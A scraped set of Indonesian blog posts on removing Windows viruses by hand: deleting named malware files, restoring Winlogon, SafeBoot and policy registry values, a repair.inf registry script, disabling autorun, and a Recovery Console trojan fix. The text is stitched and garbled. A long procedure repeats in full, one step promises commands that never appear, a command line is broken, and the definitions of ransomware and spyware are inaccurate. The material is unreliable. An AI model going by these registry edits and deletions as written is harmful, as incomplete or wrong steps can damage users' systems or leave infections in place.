o Kemudian cari dan ubah registry berikut:
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
? Klik 2x pada string [Shell], kemudian pada kolom “string value data” ubah menjadi [explorer.exe], Kemudian klik tombol [OK]
? Klik 2x pada string [Userinit], kemudian pada kolom “string value data” ubah menjadi [%System%:\userinit.exe,], Kemudian klik tombol [OK]
Catatan:
%system% ini berbeda-beda:
• [C:\Windows\system32] ? Windows XP/2003
• [C:\Winnt\system32] ? Windows 2000
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Run
? Hapus string [r13y5h4.exe]
- _LOCAL_MACHINE_SYSTEM\ControlSet001\Control\SafeBoot
? Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]
- _LOCAL_MACHINE_SYSTEM\ControlSet002\Control\SafeBoot
? Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]
- _LOCAL_MACHINE_SYSTEM\CurrentControlSet\Control\SafeBoot
? Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, kemudian hapus string berikut:
? Explorer
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer, kemudian hapus string berikut:
? NoClose
? NoDrives
? NoDriveTypeAutoRun
? NoFind
? NoFolderOptions
? NoRun
? NoStarMenuMorePrograms
? NoViewOnDrive
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, kemudian hapus string berikut:
? DisableCMD
? DisableRegistryTools
? DisableTaskMgr
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer, kemudian hapus string berikut:
? NoCLose
? NoControlPanel
? NoDrives
? NoFind
? NoFolderOptions
? NoLOgoff
? NoRun
? NoSetFolders
? NoTrayContextMenu
? NoViewOnDrive
? NoWindowsUpdate
? StartMenuLogOff
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, kemudian hapus string berikut:
? NoDispCPL
? DisableRegistryTools
? DisableTaskMgr
- _LOCAL_MACHINE_SOFTWARE\Microsoft\WindowsNT
? Pada string [RegisteredOrganization] ubah “string value data” sesuai dengan keinginan Anda
? Pada string [RegisteredOwner] ubah “string value data” sesuai dengan keinginan Anda
- _USER_%user%Software\Microsoft\Windows\CurrentVersion\Run
? Hapus string [r13y5h4.exe]
- _User_%user%\Software\Microsoft\Internet Explorer\Main
? Pada string [Start Page] ubah “string value data” menjadi [about:blank]
- _User_%user%\Control Panel\International
? Pada string [s1159] ubah “String value data” menjadi [AM]
? Pada string [s2359] ubah “string value data” menjadi [PM]
3. Restart komputer
4. Fix ulang registry untuk memastikan semua registry sudah di perbaiki, silahkan copy script dibawah ini pada program “notepad” kemudian simpan dengan nama repair.inf
Catatan
Jalankan file repair.inf ini setelah komputer restart
Berikut script yang harus di copy
[Version]
Signature=”$Chicago$”
Provider=Vaksincom Oyee
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\comfile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\exefile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\piffile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”
HKLM, Software\CLASSES\scrfile\shell\open\command,,,”””%1″” %*”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, “Explorer.exe”
HKCU, Control Panel\Desktop, Wallpaper,0,
HKCU, Software\Microsoft\Internet Explorer\Main, Start Page,0, “about:blank”
HKCU, Control Panel\International, s1159,0, “AM”
HKCU, Control Panel\International, s2359,0, “PM”
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SOFTWARE\Classes\exefile,,,application
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion, RegisteredOrganization,0, “Organization”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion, RegisteredOwner,0, “Owner”
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun,0×000000ff,255
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAutoRun,0×000000ff,255
[del]
HKCU, Softawre\microsoft\Windows\currentVersion\Run, r13y5h4.exe
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies, explorer
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableCMD
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoRecentDocsMenu
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoTrayContextMenu
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoViewContextMenu
HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoClose
HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoDrives
HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoStarMenuMorePrograms
HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoViewOnDrive
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoClose
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoControlPanel
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoDrives
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoFind
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoFolderOptions
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoLogoff
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoRun
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoSetFolders
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoTrayCOntextMenu
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoViewOnDrive
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoWindowsUpdate
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoStartMenuLogoff
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,NoDispCPL
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,DisableRegistryTools
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,DisableTaskMgr
HKCU, Software\Microsoft\Internet Explorer\Main, Window Title
5. Restart komputer, kemudian login tanpa menggunakan CD Mini PE
6. Jalankan repair.inf untuk membersihkan registry yang sudah di buat/diubah oleh virus caranya:
o Klik kanan repair.inf
o Klik Install
7. Untuk pembersihan optimal dan mencegah infeksi ulang, silahkan scan dengan antivirus yang up-to-date atau dengan menggunakan removal tools. Anda dapat menggunakan Normal Malware Cleaner dengan mendownload di alamat berikut:
http://www.norman.com/support/support_tools/58732/en
Semoga bermanfaat
salam dari saya Backdoor Sakit Hati (1mp4ct_4040
1. Hapus file virus di drive
Gunakan tools [Windows explorer] untuk memudahkan dalam mencari dan menghapus file induk virus.
- Klik [miniPE2XT]
- Klik [Programs]
- Klik [File Management]
- Klik [Windows Explorer]
Kemudian hapus file berikut:
o [C:\] atau Drive lain termasuk Flash disk
o C:\Windows
o C:\Windows\system32
o C:\Documents and Settings\%user%\Application Data%angka%Admin.exe
[Contoh: Application Data90Admin.exe]
o C:\Documents and Settings\%user%\Local Settings\Application Data%angka%r13y5h4ku.exe
[Contoh: Application Data90r13y5h4ku.exe]
o C:\Documents and Settings\%user%\Start Menu\Programs\Startup%angka%AVG Test Center.exe
[Contoh: Startup90AVG Test Center.exe] 26 files
o C:\Documents and Settings\win321.exe
o C:\WINDOWS\Web\Printers\Write.exe
o C:\WINDOWS\Web\download.exe
o C:\Windows\Cursors\newCursor.exe
o C:\Windows\Debug\adminMode.exe
o C:\Windows\Font\rieyshaTrueType.exe
o C:\Windows\Help\userhelping.exe
o C:\Windows\java\packet.exe
o C:\Windows\Media\newmedia.exe
o C:\Windows\msagent\agentkvr.exe
o C:\Windows\registration\registy.exe
o C:\Windows\repair\setup.exe
o C:\windows\tasks\newScedule.exe
o C:\windows\system32\win34.exe
o C:\WINDOWS\system\oeminfo.exe
o C:\Windows\softwaredistribution\downloads.exe
o C:\Program Files\Internet Explorer
hacker.exe
IEfree.exe
Catatan:
Hapus file virus yang mempunyai ciri-ciri:
- Menggunakan icon
- Ukuran 228 KB
- Type file “Application”
- Ekstensi EXE
Untuk mempercepat pencarian sebaiknya menggunakan tools pencarian [Search], caranya:
- Buka [Windows Explorer]
- Klik tombol [Search]
- Pada kolom “Search for files or folders names” isi dengan format *.exe
- Pada kolom “Look in:” pilih drive yang akan di periksa
- kKik opsi [Search Options >>]
- Pilih opsi “Size”
? Pilih “At most”
? Isi 229
- Klik opsi “Advanced Options”
? Pilih opsi “Search System folders”
? Pilih opsi “Search hidden files and folders”
? Pilih opsi “Search subfolders”
- Klik tombol “Search Now” untuk memulai pencarian
- Kemdian hapus file virus yang berhasil ditemukan sesai dengan ciri-ciri yang telah disebutkan di atas.
Hapus juga file berikut:
- C:\CeweNakal.scr
- C:\Windows
? Oemlogo.pif
? TAKSMAN.com
? system32folder.htt
? system32desktop.ini
? system32pesan_dari_rieysha.txt
? system32pesan.doc
? system32Autorun.inf
? system32pesanku.bat
? system32pesanQ.htm
? system32klikAku.bat
? system32klik2kali.bat
? system32rieysha.jpg
- D:\Puisi.txt
2. Hapus/edit kembali registry yang sudah diubah virus
o Masih di Mini PE, klik
o Klik MiniPE2XT]
o Klik [Programs]
o Klik [Avast! Registry Editor]
o Klik [Registry Editor]
o Setelah muncul layar [Select File With Registry], klik tombol [Load selected OS registry], jika muncul layar konfirmasi, klik tombol [OK] (lihat gambar)
o Kemudian cari dan ubah registry berikut:
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
? Klik 2x pada string [Shell], kemudian pada kolom “string value data” ubah menjadi [explorer.exe], Kemudian klik tombol [OK]
? Klik 2x pada string [Userinit], kemudian pada kolom “string value data” ubah menjadi [%System%:\userinit.exe,], Kemudian klik tombol [OK]
Catatan:
%system% ini berbeda-beda:
• [C:\Windows\system32] ? Windows XP/2003
• [C:\Winnt\system32] ? Windows 2000
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Run
? Hapus string [r13y5h4.exe]
- _LOCAL_MACHINE_SYSTEM\ControlSet001\Control\SafeBoot
? Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]
- _LOCAL_MACHINE_SYSTEM\ControlSet002\Control\SafeBoot
? Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]
- _LOCAL_MACHINE_SYSTEM\CurrentControlSet\Control\SafeBoot
? Klik 2x pada string [AlternateShell], kemudian pada kolom [String Value Data] ganti menjadi CMD.exe, kemudian klik tombol [OK]
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies, kemudian hapus string berikut:
? Explorer
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer, kemudian hapus string berikut:
? NoClose
? NoDrives
? NoDriveTypeAutoRun
? NoFind
? NoFolderOptions
? NoRun
? NoStarMenuMorePrograms
? NoViewOnDrive
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, kemudian hapus string berikut:
? DisableCMD
? DisableRegistryTools
? DisableTaskMgr
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer, kemudian hapus string berikut:
? NoCLose
? NoControlPanel
? NoDrives
? NoFind
? NoFolderOptions
? NoLOgoff
? NoRun
? NoSetFolders
? NoTrayContextMenu
? NoViewOnDrive
? NoWindowsUpdate
? StartMenuLogOff
- _LOCAL_MACHINE_SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, kemudian hapus string berikut:
? NoDispCPL
? DisableRegistryTools
? DisableTaskMgr
- _LOCAL_MACHINE_SOFTWARE\Microsoft\WindowsNT
? Pada string [RegisteredOrganization] ubah “string value data” sesuai dengan keinginan Anda
? Pada string [RegisteredOwner] ubah “string value data” sesuai dengan keinginan Anda
- _USER_%user%Software\Microsoft\Windows\CurrentVersion\Run
? Hapus string [r13y5h4.exe]
- _User_%user%\Software\Microsoft\Internet Explorer\Main
? Pada string [Start Page] ubah “string value data” menjadi [about:blank]
- _User_%user%\Control Panel\International
? Pada string [s1159] ubah “String value data” menjadi [AM]
? Pada string [s2359] ubah “string value data” menjadi [PM]
3. Restart komputer
4. Fix ulang registry untuk memastikan semua registry sudah di perbaiki, silahkan copy script dibawah ini pada program “notepad” kemudian simpan dengan nama repair.inf
Catatan
Jalankan file repair.inf ini setelah komputer restart
Berikut script yang harus di copy
[Version]
Signature=”$Chicago$”
Provider=Vaksincom Oyee
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\comfile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\exefile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\piffile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”
HKLM, Software\CLASSES\scrfile\shell\open\command,,,”””%1″” %*”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, “Explorer.exe”
HKCU, Control Panel\Desktop, Wallpaper,0,
HKCU, Software\Microsoft\Internet Explorer\Main, Start Page,0, “about:blank”
HKCU, Control Panel\International, s1159,0, “AM”
HKCU, Control Panel\International, s2359,0, “PM”
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SOFTWARE\Classes\exefile,,,application
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion, RegisteredOrganization,0, “Organization”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion, RegisteredOwner,0, “Owner”
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun,0×000000ff,255
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAutoRun,0×000000ff,255
[del]
HKCU, Softawre\microsoft\Windows\currentVersion\Run, r13y5h4.exe
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies, explorer
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableCMD
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoRecentDocsMenu
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoTrayContextMenu
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoViewContextMenu
HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoClose
HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoDrives
HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoStarMenuMorePrograms
HKCU, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoViewOnDrive
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoClose
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoControlPanel
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoDrives
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoFind
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoFolderOptions
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoLogoff
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoRun
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoSetFolders
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoTrayCOntextMenu
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoViewOnDrive
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoWindowsUpdate
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer,NoStartMenuLogoff
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,NoDispCPL
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,DisableRegistryTools
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system,DisableTaskMgr
HKCU, Software\Microsoft\Internet Explorer\Main, Window Title
5. Restart komputer, kemudian login tanpa menggunakan CD Mini PE
6. Jalankan repair.inf untuk membersihkan registry yang sudah di buat/diubah oleh virus caranya:
o Klik kanan repair.inf
o Klik Install
7. Untuk pembersihan optimal dan mencegah infeksi ulang, silahkan scan dengan antivirus yang up-to-date atau dengan menggunakan removal tools. Anda dapat menggunakan Normal Malware Cleaner dengan mendownload di alamat berikut:
http://www.norman.com/support/support_tools/58732/en
Semoga bermanfaat
salam dari saya Backdoor Sakit Hati (1mp4ct_4040
MEMBERSIHKAN KOMPUTER DARI VIRUS SECARA MANUAL
22:04
Virus komputer adalah sebuah program yang dirancang untuk mengganggu atau merusak sistem komputer dengan analogi seperti virus yang sebenarnya dimana sebuah virus dapat menginfeksi dan menular kepada komputer yang lainnya dengan berbagai cara.
Jenis-jenis Virus Komputer
Virus komputer dikategorikan dari cara kerjanya
Semoga bermanfaat
salam dari saya Backdoor Sakit Hati (1mp4ct_404)
Jenis-jenis Virus Komputer
Virus komputer dikategorikan dari cara kerjanya
- Worm – merupakan program yang diam-diam menginstallkan dirinya ke dalam komputer ketika pengguna sedang membuka laman-laman tertentu di Internet.
- Trojan – merupakan program yang menginjeksikan dirinya ke dalam sebuah program baik-baik, yang mengakibatkan Trojan tersebut aktif di memori ketika program inang tersebut dijalankan oleh pengguna.
- Hacking – merupakan serangan langsung dari hacker terhadap komputer pengguna yang mengakses laman internet tertentu, dengan atau tanpa program bantuan yang telah disisipkan di komputer pengguna.
- Backdoor – merupakan program pencuri data-data pribadi dari user, dan secara diam-diam mengirimkannya kepada sang pembuat virus.
- Spyware, Malware, dan Adware – merupakan program yang didesain untuk menjejali komputer pengguna dengan promosi-promosi yang mengganggu.
- Rogue dan Ransomware – merupakan program yang meniru program antivirus dan menampilkan aktivitas layaknya antivirus normal, dan memberikan peringatan-peringatan palsu tentang adanya virus. Tujuannya adalah agar pengguna membeli dan mengaktivasi program antivirus palsu itu dan mendatangkan uang bagi pembuat virus rogue tersebut.
- Virus Telepon Seluler – merupakan virus yang khusus berjalan di telepon seluler, dan dapat menimbulkan berbagai macam efek, mulai dari merusak telepon seluler, mencuri data-data di dalam telepon seluler, sampai membuat panggilan-panggilan diam-diam dan menghabiskan pulsa pengguna telepon seluler.
- Membersihkan Virus Secara Manual
- Matikan fasilitas autorun pada komputer. Caranya sudah saya bahas di artikel sebelumnya
- Tampilkan Hidden Files
- Tampilkan ekstensi tiap file dengan cara hilangkan tanda centang pada windows eksplorer Folder Option > Hide Extensions for known file types
- Tampilkan juga file system yang ada dengan cara menghilangkan tanda centang pada windows eksplorer Folder Option > Hide protected operating system files
- Masuk kedalam safe mode dengan cara menekan F8 pada saat booting (menyalakan) komputer
- Lakukan pencarian pada setiap partisi hard disk dengan mengetikkan *.exe, *.bat, *.vbs.
- Analisa file yang telah di temukan dengan ketentuan sebagai berikut
- Lihat filenya jika berlogo folder dan memiliki nama yang sama dengan file atau salah satunya tetapi berekstensi *.exe langsung delete saja karena sudah dipastikan itu virus
- Coba periksa file yang berekstensi *.vbs. Apakah file tersebut merupakan salah satu dari file yang kita miliki atau bukan.
- Coba periksa juga file yang berekstensi *.bat. Apakah file tersebut termasuk sebagai salah satu file system windows.
- Periksa ukuran filenya apakah ada beberapa file yang memiliki ukuran yang kecil namun nama yang berbeda.
Semoga bermanfaat
salam dari saya Backdoor Sakit Hati (1mp4ct_404)
Cara Mematikan Autorun
22:00
File Autorun adalah sebuah file yang diguanakan untuk menjalankan sebuah file yang di tunjuk saat anda memasukkan sebuah CD atau USB Flash Drive (UFD). Misalnya saat anda ingin menginstall driver dari PC anda. Anda perlu mamasukkan CD drivernya. Driver yang anda butuhkan akan berjalan otomatis tanpa perlu anda klik apa2.
Namun pemanfaatan autorun ini juga dimanfaatkan oleh virus untuk menginfeksi komputer yang di masukkan UFD.
Untuk itu alangkah baiknya jika anda me-nonaktifkan fungsi dari autorun ini.
Ada dua cara yang bisa anda gunakan untuk me-non aktifkan fungsi dari autorun ini namun anda cukup melakukan salah satu cara saja.
1. Disable Autorun/Autoplay melalui registry, caranya:

Salam dari saya Backdoor Sakit Hati (1mp4ct_404)
Namun pemanfaatan autorun ini juga dimanfaatkan oleh virus untuk menginfeksi komputer yang di masukkan UFD.
Untuk itu alangkah baiknya jika anda me-nonaktifkan fungsi dari autorun ini.
Ada dua cara yang bisa anda gunakan untuk me-non aktifkan fungsi dari autorun ini namun anda cukup melakukan salah satu cara saja.
1. Disable Autorun/Autoplay melalui registry, caranya:
- Buka Registry Editor Klik menu [Start] –[ Run | pada dialog box RUN ketik regedit
- Browse ke alamat registry berikut :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
- Kemudian klik kanan pada string NoDriveTypeAutoRun (jika pada alamat tersebut tidak ditemukan maka buat saja Dword baru)
- Isi value data dengan ff yang berarti fungsi Aturun/Autoply akan di matikan pada 255 drive
- Klik Tombol [OK] dan Restart komputer agar perubahan ini berjalan
- Klik menu [Start] –[ Run | pada dialog Ketik GPEDIT.MSC
- Setelah muncul layar “Group Policy” klik folder “System” pada menu “User Configuration” dan “Computer Configuration”
- Pada kolom Settings, klik dua kali “Turn off Autoplay”Interface Group Policy “User Configuration” Interface Group Policy “Computer Configuration”
- Setelah muncul layar “Turn off Autoplay” properties, klik tabulasi [Settings] dan pilih opsi “Enable” pada menu “Turn off Autoplay” kemudian Pilih “All Drive” pada kolom “Turn off Autoplay on” Kemudian klik tombol “OK”
- Klik “Close” untuk keluar dari layar “Group Policy”
- Agar perubahan berjalan maka Restart komputer
Salam dari saya Backdoor Sakit Hati (1mp4ct_404)
Cara AMPUH Membasmi Dan Mengatasi Virus Ganas
21:58
Cara Membasmi Virus Trojan – Trojan, seperti namanya, berwujud seperti program-program yang menarik dan dibutuhkan, seperti archiver, image-viewer, ato game-game kecil, namun ketika program tersebut dijalankan maka akan menjalankan sub-program yang ada didalamnya, bayangkan kalo sub-programnya bisa mencuri data penting perusahaan, bahaya kan? makanya jangan sekali-sekali maen game atau men-download dan menjalankan program yang aneh-aneh di internet, apalagi dari situs pembajak, Trojan? Trojan adalah salah satu jenis virus yang mencuri informasi berharga dari komputer yang terinfeksi karena ulah virus tersebut seperti password, nomor kartu kredit, serta informasi penting lain sesuai keinginan si pembuat virus tersebut. Virus trojan sangat ganas dan ini lebih berbahaya dari virus biasa lainnya, Sialnya virus ini sangat sulit dibasmi meskipun menggunakan antivirus terkenal. Norton Antivirus yang sudah diupdate virus signaturenya memang berhasil mengenali virus ini, namun gagal menghapusnya. Symantec Trojan.Vundo Removal Tool, AVG dan AVG Antispyware juga mengalami nasib yang sama.
Membasmi virus ini sangat mudahdan memang tidak sulit. Langsung saja Ikuti langkah – langkah Cara Membasmi Virus Trojan berikut :
Salam Dari Saya Backdoor Sakit Hati (1mp4ct_404)
Membasmi virus ini sangat mudahdan memang tidak sulit. Langsung saja Ikuti langkah – langkah Cara Membasmi Virus Trojan berikut :
- Booting PC dengan menggunakan CD instalasi Windows XP
- Setelah menu muncul, tekan R ( Recovery Console ).
- Lalu sobat Tekan angka yang sesuai nomor partisi Windows, biasanya 1 ( di C:\Windows ).
- Berturut-turut ketikkan perintah berikut pada layar command :
- Setelah windows restart, masuklah ke command prompt untuk memastikan bahwa file nafmhhti.dll telah benar-benar terhapus, caranya :
1. Klik Start > Run
2. Ketik cmd, tekan Enter, lalu pada layar command prompt ketik command berikut
cd c:\windows\system32
dir nafmhhti.dl
dir nafmhhti.dllbox - Pastikan bahwa kedua file tersebut tidak ditemukan Windows, artinya proses penghapusan telah berhasil.
- Selanjutnya membersihkan registry Windows. Langkahnya :
1. Klik Start > Run
2. Ketik regedit, tekan Enter
3. Klik My Computer, tekan F3 - Lalu ketiklah nafmhhti.dll pada box Search.
- Hapuslah entri-entri registri yang dtemukan untuk file tersebut. Entri bercokol di ( Default ) dengan Value c:\windows\system32\nafmhhti.dll.
- Anda tidak perlu menghapus folder induk entri tersebut, cukup hapus saja entri (Default) tadi.
- Restart komputer.
- Insya Allah virus telah musnah.
Salam Dari Saya Backdoor Sakit Hati (1mp4ct_404)
Thursday, 18 April 2013
Subscribe to:
Posts (Atom)


